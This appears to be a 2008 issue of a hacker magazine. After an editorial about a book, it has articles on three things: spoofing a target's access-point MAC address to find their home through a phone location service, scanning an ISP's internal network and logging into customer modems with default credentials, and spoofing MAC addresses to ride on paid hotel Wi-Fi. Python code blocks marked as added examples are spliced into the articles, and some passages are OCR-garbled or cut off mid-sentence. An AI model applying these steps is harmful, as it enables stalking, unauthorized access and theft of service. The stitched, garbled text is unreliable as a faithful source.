The Best of Times
Don't "Locate Me"
Exploring Road Runner's Internal Network
Hacking Wireless Networks with Windows
The HughesNet FAP
TELECOM INFORMER
Hacking Society
Thirteen Years of Starting a Hacker Scene
HPing (The Part I Forgot)
Meditation for Hackers: All-Point Techniques
Fun with Network Friends
Hacking: A Graffiti Writer's Perspective
HACKER PERSPECTIVE: Barry Wels
A Portable Encrypted Linux System for Windows
Mac Address Changer
Capturing Botnet Malware Using a Honeypot
LETTERS
Cracking with the Webtionary
JavaScript Password DOMination
Spirits 2000 Insecurity
TRANSMISSIONS
The Geek Squad
Bank of America Website Flaw
Why is This Computer Connected to the Internet?
Story: Message of the Day
MARKETPLACE
MEETINGS
The Best of Times

History is something that we're always living but rarely appreciating. This year, all of that changed for us. We got the incredible opportunity to truly acknowledge the significance of the changing trends and technologies that we have been witnessing since 1984. And now we're ready to share what came out of it all.

We're happy to announce the publication of our first-ever book: The Best of 2600: A Hacker Odyssey. When we were first approached with the idea for this project, it seemed a daunting task. And it was. After all, how could we possibly pick and choose from 24 years of publishing? And how would such a collection be ordered? The almost infinite amount of themes and subject matter we've gone through in so many issues made this seem like something we could never pull off.

So our biggest challenge was getting this massive amount of articles into some sort of order. After much brainstorming, we found the answer to be staring us in the face the whole time. What we've witnessed throughout all of our pages spans three very distinct decades: the 1980s, the 1990s, and the post-2000 period. And that is how we decided to divide the book. By decade. In so doing we quickly discovered that there was a very noticeable change of mood and tone when looking at such periods as cohesive units and then comparing them to each other.

For example, the 1980s was filled with a sense of wonder as so many new things were starting to come into play. The Bell System was being torn apart. Computers were becoming more and more popular and being found increasingly in the home. Hackers were among the first to figure it all out, finding ways of shaping the technology to their needs, and, naturally, getting into a load of trouble for their efforts. But there was still this link to the past, where mainframes dominated and phone phreaks lived in fear of arousing the ire of Ma Bell.

The 1990s was a period of growth where both telecommunications and the concept of the Internet soared into the stratosphere. Suddenly, everyone seemed to be following this stuff and the hacker world felt the effects in both good and bad ways. Having more people getting involved was certainly nice. But all of the attention was a royal pain in the ass. Hackers had always been looked upon with suspicion and paranoia but now it had graduated to genuine fear and the desire to put certain offenders behind bars. We saw that happen too many times. The dot-com boom turned many of our friends into very rich people and that tended to put all sorts of values on a collision course. And of course, this was the decade that the media really jumped into the fray. There were books and movies about hackers galore. Again, a bit of fun and a bit of a pain.

Then came 2000 and beyond. The world in this period seems to have gotten so much more serious. Everyone appears obsessed with security and convinced that everyone else is out to get them in one way or another, whether it be by stealing their identity or blowing them to smithereens. The net has become a fixture in our daily routines, speed and storage just keep increasing on a continual basis, and communicating has never been easier. But somehow, the innocence of our past seems to have been diminished. To many, the simple romance of playing with new technological toys is noticeably lacking and technology has become more of an assumed fact of our everyday lives. It's actually become easier for many of us to stay connected than to try and disconnect.

Page 4 -------------------- 2600 Magazine
In each of these distinct periods, we found there to be one remaining constant. The hacker culture has remained true to its beliefs and largely unaffected by the changing world around us. If you look at one of our articles from our early days and compare it to something from this issue, you'll notice that, while the technology is completely different, the spirit behind the writing has more or less remained the same. It's always about asking questions, performing all sorts of experiments, theorizing, and, above all else, sharing the results with the rest of us. Throughout all of the change and turmoil, this much has remained.

Once we realized that we had these three unique decades and a common thread that ran between them, it was just a matter of picking the stories that best summed up what was going on at the time. As it turned out, this was another daunting task. There were just so many fascinating pieces that have gone into our pages over the years that it became painful to decide which ones would be included and which would have to be left out. And even after we had done a whole lot of cutting and trimming, it was all too clear that we just had an overabundance of material. Trying to fit it into a 360 page book would be next to impossible. In fact, just the 1980s could have easily filled the entire page allocation if we had let it.

Fortunately, our publishers had the good sense to lobby for a dramatic increase in size for the book and we found ourselves with a limit that was over 600 pages instead. As the months went on, this wound up being increased once more to nearly 900 pages! Apparently, the publishers had just as difficult a time figuring out what to cut as we did. What better endorsement could we possibly ask for?

In the end, we wound up with a pretty neat collection of some of what's been going on in the hacker world in the last quarter century. While it's titled The Best of 2600, there are still lots of good pieces that didn't make it in for one reason or another. But we believe that if you look at all of the pieces that are included, you'll get a pretty good sense of what's been happening in our unique world since our first issue in 1984. (In fact, the very first article in our very first issue ended with the sentence: "Turn the page and become a part of our unique world.")

We want to thank the many readers who have been suggesting something like this for years. We do listen to these suggestions and we're happy that the opportunity presented itself where we could actually bring these ideas to fruition. We also want to thank Wiley Publishing and the many people over there who have worked with us on this project since it began last year. We now have something which can make a good deal of our material a lot more accessible, not only to our existing readers but to a vast number of others who have never even heard of 2600 and whose only perception of what hackers are about comes from the mass media. This is a tremendous opportunity to have our voices heard in a whole new arena and to open some doors in what others only see as walls.

And for many of us, this will be an amazing trip down Memory Lane. We tend to forget all of the magic of the past and the significance of the differences in the way things used to work, both big things and little things. An era when something like Caller ID was seen as extremely controversial, when packet switched networks were all the rage, when pagers were far more prevalent than cellular phones, when sending electronic mail between different computer systems was a really big deal. It's one thing to simply remember those days, quite another to immerse yourself in the words and emotions of the time period. What's most amazing to us is how relevant it all is, even when the technology is almost unrecognizable. And for those of you who weren't even alive back then, there is no better way to get a true sense of the history that we all know is out there somewhere.

The Best of 2600 will officially be released at The Last HOPE conference and will be available thereafter all over the world. We doubt there will ever be a book with this much information about the hacker world crammed into so many pages. But we certainly do hope to see a lot more hacker-related books and an overall increase in the interest level stemming from all of this. Because one thing we learned from going through every article we ever printed, apart from being utterly captivated by some of the stories, is that this stuff really does matter.

Summer 2008 -------------------- Page 5
Don't "Locate Me"
by Terry Stenvold
thebmxr@gmail.com

Disclaimer
This article is for educational purposes only. Check local laws before attempting anything. The author holds no responsibility for the use or misuse of this information.

General Information
As you may know, there is a new feature included in the Google Maps 1.1.3 update for the Apple iPhone and iPod Touch: the "Locate Me" feature. The new feature is provided by another company called Skyhook Wireless (http://www.skyhookwireless.com/). Skyhook's system is named WPS, for Wireless Positioning System, and locates users by knowing the location of their wireless access points. Skyhook performs its location features in a unique way because WPS requires knowledge of the specific geographical location of individual access points. Skyhook drives around to scan for and locate access points, and then appends this information to a large reference database. The problem with the system, other than knowing someone has driven by your house or business and added your AP's information to a large database, is that a third party can then locate you with only your MAC address. I recently emailed Skyhook and asked if there is a way for people to locate someone using only a MAC address, and whether there is a way to remove an access point from the database besides unplugging the access point.

This article will provide evidence contradicting both answers provided by Skyhook. It will also explain how someone with malicious intent could possibly discover your location.

Requirements
To run these scripts, you'll need a Linux computer with an ethernet connection and a wireless card capable of master mode; an iPhone, iPod Touch, or any other mobile device with the "Locate Me" feature; the MAC address of your victim's wireless access point; and an isolated area where no access points have been located and added to Skyhook's reference database.

Scripts
There are two scripts in this system. skyhack.sh will create a bridge between the ethernet and wireless card to create an AP environment. You can also use two wireless cards, but the AP doing the broadcasting must not already be mapped by Skyhook, which would require editing the scripts. delbr0.sh destroys the bridge, which returns your computer to normal.

Step 1: Gaining the MAC address of a victim
The process of acquiring a MAC address is beyond the scope of this article, but I will provide some general ideas as to how to do it. Wireless router packaging often displays the MAC address on the outside of the box, so sales personnel at an electronics store could easily write down the MAC address and keep that information until the product is sold. This is fairly useless, because the MAC address can be cloned during the setup of a wireless router, which would then change the address, rendering the original information obsolete. Another way to acquire a MAC address is via social engineering. This is accomplished by conning an individual into divulging their MAC address. Google is another source that can be used to obtain MAC addresses. Some people post their MAC addresses while seeking help in a forum to solve a problem. Gaining access to a computer through a Trojan horse and running the command "arp -a"
Step 2: Setting up your computer
The basic idea is to make your computer into an AP that spoofs the victim's MAC address. The way we do this is to bridge the ethernet cable and wireless card. The wireless card will then act as the access point of the spoofed victim. To run the bridging script, run this command from the console: ./skyhack.sh 00:00:00:00:00:00. You need to change the MAC address to the twelve-hex-digit MAC address of the victim. Your connection will then be bridged, and the router's DHCP server will hand out an IP address to your mobile device when connected.

Step 3: Finding the approximate location
When you go to your mobile device, you should see the SSID "skyhack." Connect to this "skyhack" network. To ensure that your connection is working properly, check that your IP address is not in the 169.254.0.0 address block (the link-local range a device assigns itself when it gets no DHCP lease). Your web browser should then be used to load a website to guarantee that you are receiving internet traffic. If this works, you are now ready to connect to Google Maps and use the "Locate Me" feature. Make certain there are no other APs around; if there are, be sure that they are not in Skyhook's database, as they can affect your results. By using the "Locate Me" feature, you should now be able to see the victim's approximate location within a 100m-200m diameter.

Step 4: Locating victims' exact locations
Use Google Maps to give you driving directions to the approximate location given. To return your computer to normal, run ./delbr0.sh. This removes the bridge between your ethernet and your wireless card. It also returns your wireless card to managed or default mode. Now, drive to the approximate location, and scan the local area with your laptop or mobile device for the specific MAC address in question until the location is pinpointed.
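To make the caveat in Step 3 concrete, here is an added example (my own code, not the article's scripts and not Skyhook's algorithm, whose real weighting is not on the page): a toy WPS-style estimator over a constructed reference database. A positioning service of this kind can only return a weighted centroid of the database positions of the BSSIDs the client reports, so in an isolated area the spoofed BSSID is the only match and the estimate lands exactly on the victim's mapped position, while any mapped neighbour APs in range drag the estimate away by hundreds of metres. The RSSI weighting, the coordinates and the BSSIDs are all assumptions made up for the example.

```python
"""Toy WPS-style position estimator (added example, not Skyhook's code).

Skyhook's real weighting scheme is not on the page; the RSSI weighting and
the reference database below are constructed for illustration only.
"""
import math
from typing import Dict, List, Optional, Tuple

LatLon = Tuple[float, float]


def normalize_mac(mac: str) -> str:
    """Canonicalise any common MAC spelling to lower-case 'aa:bb:cc:dd:ee:ff'.

    A database keyed on BSSIDs is only as good as its key normalisation:
    '00-11-22-33-44-55', '001122334455' and '00:11:22:33:44:55' are one AP.
    """
    digits = "".join(ch for ch in mac.lower() if ch in "0123456789abcdef")
    if len(digits) != 12:
        raise ValueError(f"not a MAC address: {mac!r}")
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


# Constructed reference database: BSSID -> (latitude, longitude).
# Made-up entries, not Skyhook data.
REFERENCE_DB: Dict[str, LatLon] = {
    "00:11:22:33:44:55": (49.2827, -123.1207),  # the "victim's" home AP
    "66:77:88:99:aa:bb": (49.2900, -123.1300),  # a mapped neighbour
    "cc:dd:ee:ff:00:11": (49.2950, -123.1100),  # another mapped neighbour
}


def estimate_position(scan: List[Tuple[str, int]],
                      db: Dict[str, LatLon] = REFERENCE_DB
                      ) -> Optional[Tuple[LatLon, int]]:
    """Estimate the client's position from a Wi-Fi scan.

    scan: (bssid, rssi_dBm) pairs as seen by the client.
    Returns ((lat, lon), number_of_matched_aps), or None if no scanned BSSID
    is in the database.  The estimate is an RSSI-weighted centroid of the
    database positions of every matched AP (assumed weighting).
    """
    total_w = 0.0
    lat_acc = lon_acc = 0.0
    matched = 0
    for bssid, rssi in scan:
        pos = db.get(normalize_mac(bssid))
        if pos is None:
            continue  # unmapped APs contribute nothing
        w = max(rssi + 100, 1)  # -40 dBm -> 60, -90 dBm -> 10
        lat_acc += w * pos[0]
        lon_acc += w * pos[1]
        total_w += w
        matched += 1
    if matched == 0:
        return None
    return (lat_acc / total_w, lon_acc / total_w), matched


def distance_m(a: LatLon, b: LatLon) -> float:
    """Great-circle distance in metres (haversine)."""
    r = 6_371_000.0
    lat1, lon1, lat2, lon2 = map(math.radians, (*a, *b))
    h = (math.sin((lat2 - lat1) / 2) ** 2
         + math.cos(lat1) * math.cos(lat2) * math.sin((lon2 - lon1) / 2) ** 2)
    return 2 * r * math.asin(math.sqrt(h))


VICTIM_BSSID = "00:11:22:33:44:55"

# Step 3 scenario: only the spoofed AP is visible (isolated area).
ISOLATED_SCAN = [(VICTIM_BSSID, -40)]

# Same spoofed AP, but two mapped neighbours and one unmapped AP in range.
CROWDED_SCAN = [
    (VICTIM_BSSID, -40),
    ("66-77-88-99-AA-BB", -70),   # mapped, pulls the estimate away
    ("ccddeeff0011", -75),        # mapped, pulls the estimate away
    ("de:ad:be:ef:00:01", -50),   # not in the database, ignored
]


def error_from_victim_m(scan: List[Tuple[str, int]]) -> Optional[float]:
    """How far the estimate lands from the victim AP's database position."""
    result = estimate_position(scan)
    if result is None:
        return None
    return distance_m(result[0], REFERENCE_DB[VICTIM_BSSID])


if __name__ == "__main__":
    print("isolated area: error = %.1f m" % error_from_victim_m(ISOLATED_SCAN))
    print("mapped neighbours present: error = %.1f m"
          % error_from_victim_m(CROWDED_SCAN))
```

With the constructed numbers, the isolated scan resolves to the victim's mapped coordinates to within a few centimetres, and the crowded scan lands roughly half a kilometre away, which is why the procedure insists on an area with no other mapped access points.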
Prevention
To prevent these types of security breaches, keep your software patches up-to-date and use virus and malware scanners to prevent intrusion by others who may then acquire the MAC address of your router. Also be wary of technical helpers over the phone or over the Internet who ask for your MAC address. A more definite way to prevent intrusion is to use the "Clone MAC" feature that can be found on most router configuration pages. This is primarily used to prevent the ISP from blocking internet access to your newly acquired hardware, making it so that only your PC can access the internet. This tool can also be used to change the MAC address so that it will point intruders to nowhere or will point them to someplace completely different. Note that Skyhook records the address your access point broadcasts over the air (the wireless BSSID), which on most routers is a separate address from the WAN-side MAC that "Clone MAC" changes; after changing it, confirm with a scan from a nearby laptop that the BSSID you see in the air is actually the new one. Always check that the newly changed MAC address is not similar to a neighbor's. With Skyhook claiming that it is not possible to remove single APs from their database, this is the best method, as long as you change the MAC often.

This method of locating has been tested with access points around my local area and also with a friend who lives almost 8000 km away. Please note that this "attack" is only as accurate as Skyhook's database.

As a side note, these types of attacks could be used to tell friends your home address. Instead of telling them that the address is "2600 Robert Street," you could say, "I am living at 00:00:00:00:00:00."

Notes
The scripts provided in this article will not work out of the box with any wireless card or ethernet adapter unless the interfaces are named ath0, wifi0, and eth0. In most other cases, a simple change from ath0 to eth1 or wlan0 is all that is needed. Using different routers will also require different IP ranges. For example, D-Link routers would use 192.168.0.5 instead of 192.168.1.5.
Exploring Road Runner's Internal Network
by Tim

Most ISPs require you to have a modem of some sort. For broadband cable, this is usually a DOCSIS (Data Over Cable Service Interface Specifications) compatible device, version 1.0, 1.1, 2.0, or 3.0, depending on your ISP's needs. This device is essential to cable internet as it isolates and uses the various frequencies on the cable line which have been reserved for internet service. All of this information is determined by your ISP and is delivered to the cable modem via tftp from some server on your ISP's non-public network. Your cable modem has a MAC address like any other network device, and it is usually this that the ISP uses to authenticate you to the network. The CMTS (Cable Modem Termination System) is where the transition between cable and fiber happens, for those that are interested. At any rate, once your device is determined to be legitimate (again, the method is determined by the ISP, but is most likely the MAC address) you are leased a public IP address. There is also an internal IP address granted to the modem, and it usually resides somewhere in the 10.x private subnet. This address should never be accessible either from your own computer or by anyone else that isn't correctly authenticated on the network. This is to prevent various horrible things from happening, such as the use of one of the many in-band configuration methods for routers and switches that reside on the networks. Most devices decide who should be able to access the device remotely only by seeing which network they reside on. If you access the 10.x side of the device, the odds are good that you'll be allowed access at least at the same level as the ISP. Simple enough. Now, once your device is given the correct network configuration, it then forwards those settings onto your computer. If you are not using a router or some middle-man appliance, then your computer will inherit the TCP/IP configuration, allowing you to access the internet at large.

The cable modem is essentially doing very simple routing for your computer. It is simply taking everything given to it and pushing it through the other side in accordance with the ISP's settings. This is how it was intended to be. The cable company can terminate your connection by sending a series of commands to the device. It can similarly throttle your connection, do troubleshooting, and so on. They do this either by using proprietary tools such as Orion, which has some phenomenal CMTS tools, or by using in-house tools, usually PHP, ASP, or Perl scripts running on some machine that manages the network. (See the resources at the end of this article for some interesting sites on the Road Runner network.) From there, they can do all sorts of stuff, but the important thing to remember is that they are not using your public IP address to do this; they are using the private IP address given to your modem. This is where my story begins.

I was sitting in my office, configuring my router to support the addition of a couple more subnets in the 10.0.0.0/24 range. As I was doing this, I decided that the easiest way to test for connectivity among the various subnets was to simply allow all traffic on the 10.0.0.0/8 network to pass to any of the other subnets. So, I set all this up and let some ICMP traffic fly across the wires. This is where it got interesting.

I typed an IP address incorrectly. To be specific, I typed 10.0.0.10 and pressed enter. Knowing that this IP address would not be found on my network, I went to Ctrl+C the command. What did I see appear on my console? "Reply from 10.0.0.10: bytes=32 time=76ms TTL=128." My first thought was that someone had penetrated my network and established an entire subnet without me noticing. Then I saw the latency and decided to do a traceroute. Sure enough, the trace passed through my router, through the ISP-provided modem, and over the Road Runner network, eventually coming to a stop at some poor soul's Ambit cable modem.

Admittedly, I was very curious, so I ran
some simple nmap commands and discovered that this device was listening on port 80. So, I loaded Firefox and hit the device with HTTP. Sure enough, I saw the cable modem's management screen. Being the concerned citizen that I am, I tested the login to make sure the defaults had been changed. Much to my surprise, I could log in and get full viewing and configuration access with username and password "user." I then had admin access to someone's cable modem, complete with an internal IP address range on Road Runner's network, the public IP address, the MAC address, and everything else needed to clone their cable modem and steal their service. From the screen which came up, you can restart the device, reset it to the factory defaults, or do pretty much anything you want. My mind boggles at the concept. And this is just 10 addresses into a 16 million host subnet. I immediately powered up nmap with OS fingerprinting and version scanning with the target network of 10.0.0.0/8. I watched as the log file grew from 1k to 10k to 100k to 1000k. After a couple of hours, I had a 5MB file, full of cable modems running HTTP, SSH, telnet, and various other services, all of them using default logins and passwords. Most of them are running vulnerable versions of SSH, and all of them will fall back to SSH1, which means that any passwords that may be in place protecting the shell access offer little real protection.

I suddenly realized that Road Runner might notice all of the scanning that I was doing, so I called up Road Runner tech support and asked to speak to someone in the security department. They put me on hold, and I listened to crappy music for about ten minutes before someone finally picked up. We will call him Bill.

"Hello, thank you for calling Road Runner technical support. My name is Bill, how can I help you?"

"Hi, Bill. My name is Tim. I'm just calling to report some strange behavior on your network. It seems that I am able to see some of your internal IP addresses. I can access your entire class A subnet as if it were public."

"Oh... hold on a minute. I have to make a call."

I was then put on hold for about twenty minutes. Eventually Bill returned, with an edge of concern in his voice.

"Can you give me some more information about this? What addresses are you seeing? What do you think is allowing you to do this?"

"Well, any IP address on the Road Runner network that starts with 10 is visible to me. There don't seem to be any restrictive measures in place or anything, Bill. As for how this has been happening, I'm not sure."

"Okay, do you see any other private IP addresses, anything like 192?"

"Doesn't seem like it, Bill, but I haven't really looked either."

"How are you seeing these IP addresses? Are you using a packet sniffer or something?"

At this point, I realized that he was very concerned and that he was fishing for information. I told the truth, as I don't want to go to jail for terrorism or some other equally absurd reason. (Hooray for abusive and unconstitutional laws!)

"I'm just using nmap to scan the subnet, no packet sniffers or anything. So, yeah, I'm actually very concerned about this. If I can see these internal IP addresses, it means that I can sniff traffic off the network as well, Bill. I don't like that. If I found this by mistake, someone out there will certainly find it as well. I mean, if I were malicious, I could cause some serious damage. These devices have default admin logins. Oh, and the guy at 10.0.0.10 is having network issues."

"Really?" He chuckled nervously. "Well, hold on a minute. I have to make a call."

I waited on hold again, this time for only a couple of minutes.

"Alright, the security specialists say that this is normal for the network. Since you're a part of the network, you should be able to see the other machines, so it's okay. You're on a business account and, since you have a static IP, you are able to see some things that most of our customers cannot. I'll make some notes on your account so that it's clear that you mentioned this to us and were concerned. You might get a call from the Road Runner security department some time in the future. Is there anything else?"

The conversation ended with the standard scripted closing, and I hung up the phone. Normal operational behavior? An entire internal IP address range available publicly? I could see not just an entire subnet, but the entire 10.x network, the entire Road Runner network. I decided to test Bill's theory about the business connection. I SSHed into my Linux box at home and issued a ping to 10.0.0.10. Sure enough, it responded. So, everyone on the Road Runner network can simply use this private IP range to access network equipment. I quickly loaded up nmap and continued the scan.

At this point in time, I had found several thousand modems, nearly all of them running
webservers, many of them also running SSH and telnet. I also found several cable modems acting as routers. If someone were to log into one of those devices, it wouldn't be hard to set up forwards into the NATed network or to forward all their traffic through a tunnel to some other PC. The possibilities then would be nearly limitless: hijacking VoIP service by cloning their hardware, stealing internet service by cloning the MAC address, changing settings, or redirecting the location of the default DOCSIS servers, among other things.
As far as ISP-level equipment goes, Road Runner's DHCP servers, DNS servers, and network monitoring services are all available for scanning. Worse, nmap's version reporting option (-sV) shows version numbers for the services running. Many of these are reported correctly, and several of them are vulnerable to very well-known exploits. For instance, on one particular server the SSH daemon is set to roll back to SSH1 if the client doesn't support SSH2. Aside from all of that, a quick scan of the log file reveals the type of IDS they're using, the type of network monitoring software they're using, strange and unneeded third party applications such as screencast, and other pieces of information, all freely available. Honestly, I don't imagine that it would take a skilled hacker more than an hour or two to successfully compromise the systems. The servers are pretty homogeneous, apparently consisting mainly of Linux servers running essentially the same applications, so the odds are good that if you can compromise one system, then you can take the rest as well. Also, each system seems to be a central IDS reporting center, most likely for whatever section of the network it controls, and syslog information is forwarded to those machines. The information that could be gleaned from the log files alone would be worth its weight in gold.

Of the 25,000 or so devices that showed up, about 100 of them seemed to be ISP servers. I stopped scanning after about 12 hours because I felt like I had seen enough, but anyone who scans the entire 10.x subnet would undoubtedly discover much more than I have.

Needless to say, the potential for abuse here is tremendous, and it's shocking that this kind of network behavior was ever engineered to begin with. Under normal circumstances, their routers and firewalls should filter public requests for private IPs (more precisely, customer-side traffic should never be routed into the modem-management address space at all, whatever its source address), but I guess this isn't being done.

I guess it's true what they say about corporate networks: hard on the outside, gooey on the inside.

One final note: There are interesting sites at tools.location.rr.com, where location is your geographical region, usually pretty easy to figure out. For example, the Tampa, Florida area is http://tools.tampabay.rr.com. The login and password have recently changed, but these sites contain all the information needed to hijack someone's account or to change most, if not all, of the services attached to the account. Pretty slick stuff.
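As an added example of turning a scan like the one above into findings (my own code, not the author's scan output or tooling), here is a small triage of nmap's grepable (-oG) format with version detection (-sV) enabled. The sample lines are constructed to resemble two cable modems and one ISP-side server of the kind the article describes; they are not real results. The one detail worth knowing: OpenSSH advertises "protocol 1.99" in its version banner when it still accepts SSH-1 clients alongside SSH-2, and "protocol 1.5" when it speaks SSH-1 only, which is exactly the roll-back the article mentions, so a version-scan log is enough to find those hosts without touching them again.

```python
"""Triage of nmap grepable output (added example, not the article's scan).

The sample lines below are constructed to look like `nmap -sV -oG` output for
three hosts of the kind the article describes; they are not real scan results.
"""
import re
from typing import Dict, List

# Constructed sample: two cable modems and one ISP-side server (not real data).
SAMPLE_OG = """\
# Nmap 4.62 scan initiated (constructed sample)
Host: 10.0.0.10 ()\tStatus: Up
Host: 10.0.0.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/, 23/open/tcp//telnet//Ambit telnetd/, 80/open/tcp//http//thttpd 2.25b/\tIgnored State: closed (997)
Host: 10.0.0.11 ()\tPorts: 80/open/tcp//http//Motorola SB5100 httpd/, 443/closed/tcp//https///\tIgnored State: closed (998)
Host: 10.1.2.3 (mon1.example)\tPorts: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/, 53/open/tcp//domain//ISC BIND 9.3.4/, 514/open/tcp//syslog///\tIgnored State: closed (997)
"""

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)\s+Ports:\s+(.*?)(?:\t|$)")
# OpenSSH reports "protocol 1.99" when it accepts both SSH-1 and SSH-2 clients
# and "protocol 1.5" when it speaks SSH-1 only; either allows the roll-back.
SSH1_RE = re.compile(r"protocol 1\.(99|5)\b")


def parse_grepable(text: str) -> Dict[str, List[dict]]:
    """Map each host that has a Ports: field to its list of port records."""
    hosts: Dict[str, List[dict]] = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment lines and Status-only lines
        ip, _hostname, portfield = m.groups()
        ports = []
        for entry in portfield.split(", "):
            # nmap's field order: port/state/proto/owner/service/rpcinfo/version/
            f = entry.rstrip("/").split("/")
            f += [""] * (7 - len(f))  # trailing empty fields were stripped above
            ports.append({"port": int(f[0]), "state": f[1], "proto": f[2],
                          "service": f[4], "version": f[6]})
        hosts[ip] = ports
    return hosts


def triage(text: str) -> Dict[str, List[str]]:
    """Flag, per host, the exposure classes the article found on the 10/8 net."""
    findings: Dict[str, List[str]] = {}
    for ip, ports in parse_grepable(text).items():
        flags = []
        for p in ports:
            if p["state"] != "open":
                continue
            if p["service"] == "ssh" and SSH1_RE.search(p["version"]):
                flags.append(f"ssh accepts SSH-1 ({p['version']})")
            if p["service"] == "telnet":
                flags.append("cleartext telnet management")
            if p["service"] in ("http", "https"):
                flags.append(f"web management on {p['port']}")
            if p["service"] == "syslog":
                flags.append("syslog collector reachable")
        if flags:
            findings[ip] = flags
    return findings


def count_ssh1_hosts(text: str) -> int:
    """How many hosts in the log would let a client roll back to SSH-1."""
    return sum(1 for flags in triage(text).values()
               if any(f.startswith("ssh accepts SSH-1") for f in flags))


if __name__ == "__main__":
    for ip, flags in triage(SAMPLE_OG).items():
        print(ip, "->", "; ".join(flags))
    print("hosts accepting SSH-1:", count_ssh1_hosts(SAMPLE_OG))
```

Run against a real -oG file the same parser works unchanged, since nmap keeps the port/state/proto/owner/service/rpcinfo/version field order; only the flag rules need extending for whatever services matter in your own environment.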
Hacking Wireless Networks with Windows
by Carbide

First, the necessary disclaimer: gaining unauthorized access to wireless networks, especially when someone wants you to pay, is probably illegal. This article is provided for information only.

I was recently on a business trip, and I took the company-provided Windows laptop with me. The hotel I was staying in had Wayport wireless access[1] for a fee. Opening up Firefox took me to the page that explains the pricing and service. The hotel I was in happened to have only unlimited plans, which I'll explain later. My friend once told me that he had read in 2600 a way to gain access to wireless networks by MAC address spoofing in Linux. He basically described that you find other computers on the wireless network, then find their MAC addresses, then change your MAC address to match theirs. Once this is done, the wireless router routes every other packet to your computer. The way it was described, the wireless router thinks both computers are one computer because they have the same hardware address.

Not having Linux with me at the time, I made sure I had two very important programs: Kaboodle[2] and Technitium MAC address changer[3]. First, I connected to the wireless access point of interest and opened up Firefox to ensure that the correct page was displayed. Second, I opened up Kaboodle and waited for every computer on the network to be scanned. This may take a while if the network is really busy. Then, the computers were displayed; some are shown as computer names like NANCY, others as IP addresses. Double clicking on one of them shows the computer's MAC address:

[Screenshot: Kaboodle's details window for one computer, showing its MAC address]
The n ext step i s to change your M AC
address to the o n e that i s d i s p l ayed . There
are severa l ways to do t h i s i n W i n dows.
On e way that I'm fami l iar w ith i s to edit the
registry to change the address, but I prefer
the Techn iti um M AC address changer for
frequent changes. Open u p th i s program,
a n d change the M AC address to the o n e
that i s d i s p l ayed by Kabood l e:
The wireless card should be disabled and then re-enabled, and then it should reconnect to the network of interest. Navigate to your homepage and it should display. Some problems that might be encountered are slow page load times, frequent disconnects and reconnects to the access point, and a complete inability to access the AP at all. I encountered slow page load times. This might be attributed to both computers trying to access a lot of information at one time or downloading or uploading large amounts of data. If this happens, changing to a different MAC address might be useful. The second problem might be the router trying to defeat this method, detecting two identical MAC addresses, and not allowing either to connect. The third problem might be that the router has detected one MAC address first and will not allow an identical one to connect because it has already associated.
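From the access point's side, the failure modes just described (two stations on one MAC, a hostname that flips, constant reassociations) are detectable. The Python below is an added example, not from the article, that runs such a check over constructed association log lines in a hypothetical format; adapt parse_line() to what your AP or DHCP server really emits.

```python
# Added example (not from the article): spotting a MAC address that is being
# used by two stations at once, from access-point association logs.
# The log format is constructed for the example.
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: NANCY is the legitimate client; a second station using
# NANCY's address shows up with a different hostname and weaker signal,
# and the two keep knocking each other off the AP.
SAMPLE_LOG = """\
2008-06-01T10:00:05 assoc mac=00:13:02:aa:bb:cc ip=10.0.0.12 host=NANCY rssi=-48
2008-06-01T10:00:41 assoc mac=00:13:02:11:22:33 ip=10.0.0.13 host=LAPTOP2 rssi=-61
2008-06-01T10:05:12 assoc mac=00:13:02:aa:bb:cc ip=10.0.0.12 host=VISITOR rssi=-70
2008-06-01T10:05:50 disassoc mac=00:13:02:aa:bb:cc
2008-06-01T10:06:02 assoc mac=00:13:02:aa:bb:cc ip=10.0.0.12 host=NANCY rssi=-47
2008-06-01T10:06:30 disassoc mac=00:13:02:aa:bb:cc
2008-06-01T10:06:44 assoc mac=00:13:02:aa:bb:cc ip=10.0.0.12 host=VISITOR rssi=-71
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<event>assoc|disassoc) mac=(?P<mac>[0-9a-f:]{17})"
    r"(?: ip=(?P<ip>\S+) host=(?P<host>\S+) rssi=(?P<rssi>-?\d+))?$"
)

def parse_line(line):
    """Parse one constructed log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"]).timestamp()
    rec["rssi"] = int(rec["rssi"]) if rec["rssi"] is not None else None
    return rec

def find_shared_macs(log_text, flap_window=600, flap_limit=3, rssi_delta=15):
    """Return {mac: [reasons]} for addresses that look shared between stations.

    Three signals are combined: a new association arriving while the same
    MAC is still associated under another hostname, a large jump in signal
    strength between the two, and repeated (re)associations in a short window."""
    active = {}                      # mac -> last association record
    assoc_times = defaultdict(list)  # mac -> recent association timestamps
    findings = defaultdict(set)
    for rec in filter(None, map(parse_line, log_text.splitlines())):
        mac = rec["mac"]
        if rec["event"] == "disassoc":
            active.pop(mac, None)
            continue
        prev = active.get(mac)
        if prev is not None:
            # A second association for a MAC that never disassociated.
            if prev["host"] != rec["host"]:
                findings[mac].add("two hostnames while associated")
            if abs(prev["rssi"] - rec["rssi"]) >= rssi_delta:
                findings[mac].add("signal strength jump while associated")
        active[mac] = rec
        recent = [t for t in assoc_times[mac] if rec["ts"] - t <= flap_window]
        recent.append(rec["ts"])
        assoc_times[mac] = recent
        if len(recent) >= flap_limit:
            findings[mac].add("reassociation flapping")
    return {mac: sorted(reasons) for mac, reasons in findings.items()}

if __name__ == "__main__":
    for mac, reasons in find_shared_macs(SAMPLE_LOG).items():
        print(mac, "->", ", ".join(reasons))
```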
Several moral and ethical problems might be considered. For example, if this is not an unlimited plan, then each byte might cost the customer money. Common courtesy would dictate that you make sure you're using an unlimited plan. Also, if the user suspects that activity has been going on when they were not using the service, it might raise some questions. Another potential problem would arise if the customer gets randomly kicked off; they might call technical support to investigate, which could further complicate matters. The last moral dilemma is charging for wireless access in the first place, which should put people at unease, but, surprisingly, doesn't. One problem with this is charging for a substandard service when other services are available that people would have no objection to paying for, such as ethernet and fiber optic connections. The other problem with charging is that offering free wireless access attracts customers to whatever service you are offering, whether it's staying at a hotel or getting a cup of coffee. I apologize for the digression and for any disagreeing letters that might follow.
References
